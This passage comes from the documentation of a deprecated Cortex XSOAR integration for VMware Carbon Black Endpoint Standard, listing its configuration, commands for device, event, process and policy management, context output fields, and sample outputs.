VMware Carbon Black Endpoint Standard (Deprecated)

This Integration is part of the Carbon Black Endpoint Standard Pack.#

Deprecated

Use Carbon Black Endpoint Standard instead.

Overview

Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Cortex XSOAR.

Use cases

Get information about events, policies, devices, and processes on Carbon Black.
Update events, policies, devices, and processes on Carbon Black.
Delete rules from policies.
Create new policies.

Configure VMware Carbon Black Endpoint Standard on Cortex XSOAR

Navigate to Settings > Integrations > Servers & Services.
Search for VMware Carbon Black Endpoint Standard.
Click Add instance to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
Click Test to validate the URLs, token, and connection.

Commands

Get the status of multiple devices: cbd-get-devices-status
Get the status of a specified device: cbd-get-device-status
Change the security policy assigned to a device: cbd-change-device-status
Get multiple events: cbd-find-events
Get a specified event: cbd-find-event
Get multiple processes: cbd-find-processes
Get alert details: cbd-get-alert-details
Get all policy details: cbd-get-policies
Get the details of a specified policy: cbd-get-policy
Create a policy: cbd-create-policy
Update a policy: cbd-update-policy
Delete a policy: cbd-delete-policy
Add a rule to a policy: cbd-add-rule-to-policy
Delete a rule from a policy: cbd-delete-rule-from-policy
Update a rule in a policy: cbd-update-rule-in-policy
Set a policy: cbd-set-policy

Get the status of multiple devices

Retrieves the status of multiple devices, as specified by further input.

Base Command

cbd-get-devices-status

Input

Parameter	Description	More Information
hostName	Host name of the device to search for.	Case insensitive
hostNameExact	Exact host name of device to search for	Case sensitive
ownerName	Device owner name	Case insensitive
ownerNameExact	Exact device owner name	Case sensitive
ipAddress	External or internal IP address of the device to search for	-
start	Shows result from this row and after	-
rows	Maximum number of rows of result.	This parameter can be limited on the Cb Defense server side

Context Output

Path	Description
CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime	Activation code expiry time
CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress	Last external IP address
CarbonBlackDefense.GetDevicesStatus.Results.LastLocation	Last location
CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime	Last reported time
CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime	Last shutdown time
CarbonBlackDefense.GetDevicesStatus.Results.OsVersion	Operating system version
CarbonBlackDefense.GetDevicesStatus.Results.PolicyId	Policy ID
CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime	Registered time
CarbonBlackDefense.GetDevicesStatus.Results.Status	Status
CarbonBlackDefense.GetDevicesStatus.Results.DeviceId	Device ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId	Device owner ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Description	Device type
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId	Organization ID
CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion	Sensor version
CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType	Target priority type
CarbonBlackDefense.GetDevicesStatus.Results.Email	Email address
CarbonBlackDefense.GetDevicesStatus.Results.LastContact	Last contact
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName	Organization name
CarbonBlackDefense.GetDevicesStatus.Results.SensorStates	Sensor states
CarbonBlackDefense.GetDevicesStatus.Results.AvStatus	AV status
CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress	Last internal IP address
CarbonBlackDefense.GetDevicesStatus.Results.Name	Name
CarbonBlackDefense.GetDevicesStatus.Results.PolicyName	Policy name
CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate	Sensor out-of-date
CarbonBlackDefense.GetDevicesStatus.Results.TestId	Test ID

Command Example

!cbd-get-devices-status rows="1"

Context Example

CarbonBlackDefense:{} 1 item
GetDevicesStatus:{} 1 item
Results:{} 25 items
ActivationCodeExpiryTime:1524157210454
AvStatus:null
LastContact:1533646970617
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8

Human Readable Output

ActivationCodeExpiryTime	1524157210454
AvStatus
DeviceId	844355
DeviceOwnerId	278380
DeviceType	MAC
Email	cberninger
LastContact	1533646970617
LastExternalIpAddress	67.143.208.113
LastInternalIpAddress	192.168.2.125
LastLocation	OFFSITE
LastReportedTime	1533642023089
LastShutdownTime	1533587921518
Name	cberninger-mac2
OrganizationId	1105
OrganizationName	cb-internal-alliances.com
OsVersion	MAC OS X 10.10.5
PolicyId	6525
PolicyName	default
RegisteredTime	1523552410489
SensorOutOfDate	false

Get the status of a specified device

Retrieves the status of a specified device.

Base Code

cbd-get-device-status

Input

Parameter	Description
deviceId	Individual device ID

Context Output

Path	Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType	Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId	Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime	Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId	Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email	Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress	Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation	Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion	Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus	AV status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress	Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime	Time of registration
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact	Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status	Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId	Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId	Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion	Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName	Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics	Rooted ByAnalytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion	Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType	Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName	Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime	Rooted ByAnalytics Time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate	Sensor out-of-date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates	Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name	Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id	ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime	Last reported time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId	Device owner ID

Command Example

!cbd-get-device-status deviceId="844355"

Context Example

CarbonBlackDefense:{} 1 item
GetDeviceStatus:{} 1 item
DeviceInfo:{} 25 items
ActivationCodeExpiryTime:null
AvStatus:null
LastContact:1533648166041
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8

Human Readable Output

ActivationCodeExpiryTime
AvStatus
DeviceId	844355
DeviceOwnerId	278380
DeviceType	MAC
Email	cberninger
LastContact	1533648166041
LastExternalIpAddress	67.143.208.113
LastInternalIpAddress	192.168.2.125
LastLocation	OFFSITE
LastReportedTime	1533642023089
LastShutdownTime	1533587921518
Name	cberninger-mac2
OrganizationId	1105
OrganizationName	cb-internal-alliances.com
OsVersion	MAC OS X 10.10.5
PolicyId	6525
PolicyName	default
RegisteredTime	1523552410489
SensorOutOfDate	false

Change the security policy assigned to a device

Changes the security policy assigned to a specified device.

Base Command

cbd-change-device-status

Input

Parameter	Description
deviceId	The device ID
policyId	The policy ID
policyName	The policy name

Context Output

Path	Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType	Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId	Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime	Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId	Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email	Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress	Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation	Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion	Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus	Anti-virus status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress	Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime	Registration time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact	Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status	Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId	Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId	Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion	Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName	Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics	Rooted ByAnalytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion	Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType	Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName	Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime	Rooted ByAnalytics time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate	Sensor out-of-date date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates	Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name	Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id	ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime	Time of last report
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId	Device owner ID

Command Example

!cbd-change-device-status deviceId="844355" policyName="default"

Context Example

CarbonBlackDefense:{} 1 item
ChangeDeviceStatus:{} 1 item
DeviceInfo:{} 24 items
AvStatus:null
LastContact:1533648445513
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8

Human Readable Output

AvStatus
DeviceId	844355
DeviceOwnerId	278380
DeviceType	MAC
Email	cberninger
LastContact	1533648445513
LastExternalIpAddress	67.143.208.113
LastInternalIpAddress	192.168.2.125
LastLocation	OFFSITE
LastReportedTime	1533642023089
LastShutdownTime	1533587921518
Name	cberninger-mac2
OrganizationId	1105
OrganizationName	cb-internal-alliances.com
OsVersion	MAC OS X 10.10.5
PolicyId	6525
PolicyName	default
RegisteredTime	1523552410489
SensorOutOfDate	false
SensorStates	ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED

Get multiple events

Returns multiple event details, as specified by further input.

Base Command

cbd-find-events

Input

Parameter	Description	More Information
hostName	The host name of the event to search for	Case in sensitive.
hostNameExact	The exact host name of the event to find	Case sensitive.
ownerName	Owner name of the event to search for	Case in sensitive.
ownerNameExact	The exact owner name of the event to search for	Case sensitive.
ipAddress	External or internal IP address	-
sha256hash	Searches for events generated by a process with this SHA-256 hash	Must be in lowercase.
applicationName	Searches for events generated by a process with this application name	Must be in lowercase.
eventType	Searches for events associated with this event type	-
searchWindow	Events generated within this time frame	Default is one day. Events might not be available after 30 days due to retention policies.
start	Shows result from this row and after	-
rows	Maximum number of rows of result	This parameter can be limited on the Cb Defense server side.

Context Output

Path	Description
CarbonBlackDefense.FindEvents.Results.EventType	Event type
CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart	Milliseconds since the beginning of the process
CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name	Name
CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid	Private PID
CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId	Process ID
CarbonBlackDefense.FindEvents.Results.ShortDescription	Short description
CarbonBlackDefense.FindEvents.Results.CreateTime	Time of creation
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName	Device name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion	Device version
CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName	Policy name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType	Target priority type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation	Agent location
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId	Device ID
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address	IpV4 address of the device
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode	Area code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode	Country code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude	Latitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude	Longitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City	City
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName	Country name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode	DMA code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode	Metro code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode	Postal code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region	Region
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress	Device IP address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType	Device type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email	Email address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode	Target priority code
CarbonBlackDefense.FindEvents.Results.EventId	Event ID
CarbonBlackDefense.FindEvents.Results.EventTime	Event time
CarbonBlackDefense.FindEvents.Results.LongDescription	Long description
CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress	Dest address
CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort	Dest port
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn	Peer Fqdn
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress	Peer IP address
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address	Peer IpV4 address
CarbonBlackDefense.FindEvents.Results.NetFlow.Service	Service
CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress	Source address
CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort	Source port
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName	Application name
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath	Application path
CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash	MD5 hash
CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash	SHA-256 hash
CarbonBlackDefense.FindEvents.Results.ThreatIndicators	Threat indicators

Command Example

!cbd-find-events rows=1 </p?

Context Example

CarbonBlackDefense:{} 1 item
FindEvents:{} 2 items
Results:{} 10 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
SelectedApp:{} 7 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
EffectiveReputation:LOCAL_WHITE
EffectiveReputationSource:PRE_EXISTING
Md5Hash:b43632f807770d141008deb988a65ad9
ReputationProperty:NOT_LISTED
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 12 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceLocation:{} 6 items
City:null
CountryCode:US
CountryName:United States
Latitude:37.751007
Longitude:-97.822
Region:null
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
PolicyName:default
TargetApp:{} 5 items
ApplicationName:null
EffectiveReputation:null
EffectiveReputationSource:null
ReputationProperty:null
Sha256Hash:null
ProcessDetails:{} 11 items
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
MilisSinceProcessStart:147443253
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
TotalResults:{} 1 item
TotalResults:10666
Endpoint:{} 4 items
Domain:null
Hostname:cberninger-mac2
IPAddress:67.143.208.113
OS:MAC
Process:{} 9 items
Path:null
SHA1:null
ParentID:null
PID:1071
Name:cloud-drive-ui
Endpoint:null
ParentName:null
MD5:null
CommandLine:null

Human Readable

CreateTime	1533650036964
DeviceDetails AgentLocation	OFFSITE
DeviceDetails DeviceId	844355
DeviceDetails DeviceIpAddress	67.143.208.113
DeviceDetails DeviceIpV4Address	67.143.208.113
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode	US
DeviceDetails DeviceLocation CountryName	United States
DeviceDetails DeviceLocation Latitude	37.751007
DeviceDetails DeviceLocation Longitude	-97.822
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName	cberninger-mac2
DeviceDetails DeviceType	MAC
DeviceDetails DeviceVersion	MAC OS X 10.10.5
DeviceDetails Email	cberninger
DeviceDetails PolicyName	default
DeviceDetails TargetPriorityCode	1
DeviceDetails TargetPriorityType	MEDIUM
EventId	4ad25ae99a4911e88515b3c49ffeda59
EventTime	1533649991975

Get a specified event

Returns a the details of a specified event.

Base Command

cbd-find-event

Input

Parameter	Description
eventId	Event ID

Context Output

Path	Description
CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription	Short description
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName	Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty	Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash	SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventType	Event type
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash	MD5 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash	SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath	Application path
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty	Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName	Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId	Organization ID
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName	Organization name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType	Organization type
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName	Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash	SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventId	Event ID
CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription	Long description
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address	Device IpV4 address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType	Device type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email	Email address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode	Target priority code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation	Agent location path
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName	Device host name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId	Device ID
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName	Group name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion	Device version
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType	Target priority type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress	Device IP address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude	Latitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City	City
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode	Country code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode	DMA code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude	Longitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode	Metro code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode	Postal code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region	Region
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode	Area code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName	Country name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName	Device name
CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime	Time of creation
CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime	Event time
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName	Full user name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name	Name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine	Parent command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName	Parent name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid	Parent PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId	Process ID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine	Command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart	Milisecconds since process start
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine	Target command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid	Target PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName	User name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid	Parent private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid	Private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName	Target name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid	Target private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators	Threat indicators

Command Example

!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"

Context Example

CarbonBlackDefense:{} 1 item
FindEvent:{} 1 item
EventInfo:{} 13 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 13 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceHostName:null
GroupName:null
DeviceLocation:{} 10 items
CountryName:United States
CountryCode:US
DmaCode:0
MetroCode:0
City:null
Latitude:37.751007
Longitude:-97.822
Region:null
PostalCode:null
AreaCode:0
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
ProcessDetails:{} 15 items
ParentPid:null
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
ParentPrivatePid:null
MilisSinceProcessStart:147443253
ParentName:null
ParentCommandLine:null
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
ParentHash:{} 2 items
ApplicationName:null
Sha256Hash:null
ProcessHash:{} 5 items
ApplicationName:null
ApplicationPath:null
Md5Hash:null
ReputationProperty:null
Sha256Hash:null
ThreatIndicators:[] 2 items
0:UNKNOWN_APP
1:NETWORK_FLOW
OrgDetails:{} 3 items
OrganizationId:null
OrganizationName:null
OrganizationType:null
TargetHash:{} 3 items
ApplicationName:null
ReputationProperty:null
Sha256Hash:null

Human Readable Output

CreateTime	1533650036964
DeviceDetails AgentLocation	OFFSITE
DeviceDetails DeviceHostName
DeviceDetails DeviceId	844355
DeviceDetails DeviceIpAddress	67.143.208.113
DeviceDetails DeviceIpV4Address	67.143.208.113
DeviceDetails DeviceLocation AreaCode	0
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode	US
DeviceDetails DeviceLocation CountryName	United States
DeviceDetails DeviceLocation DmaCode	0
DeviceDetails DeviceLocation Latitude	37.751007
DeviceDetails DeviceLocation Longitude	-97.822
DeviceDetails DeviceLocation MetroCode	0
DeviceDetails DeviceLocation PostalCode
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName	cberninger-mac2
DeviceDetails DeviceType	MAC
DeviceDetails DeviceVersion	MAC OS X 10.10.5
DeviceDetails Email	cberninger

Get multiple processes

Returns the details of multiple process, as specified by further input.

Base Command

cbd-find-processes

Input

Parameter	Description	More Information
hostNameExact	The exact hostname.	Case sensitive.
ownerName	Case insensitive owner name.	Case in sensitive.
ownerNameExact	Exact owner name	Case sensitive.
ipAddress	External or internal IP address	-
searchWindow	Events generated within a given time frame	Default is one day. Events may not be available after 30 days due to retention policies.
start	Shows result from this row and after	-
rows	Maximum number of rows of result	This parameter can be limited on the Cb Defense server side.

Context Output

Path	Description
CarbonBlackDefense.GetProcesses.ApplicationName	Application name
CarbonBlackDefense.GetProcesses.ProcessId	Process ID
CarbonBlackDefense.GetProcesses.NumEvents	Number of events
CarbonBlackDefense.GetProcesses.ApplicationPath	Application path
CarbonBlackDefense.GetProcesses.PrivatePid	Private PID
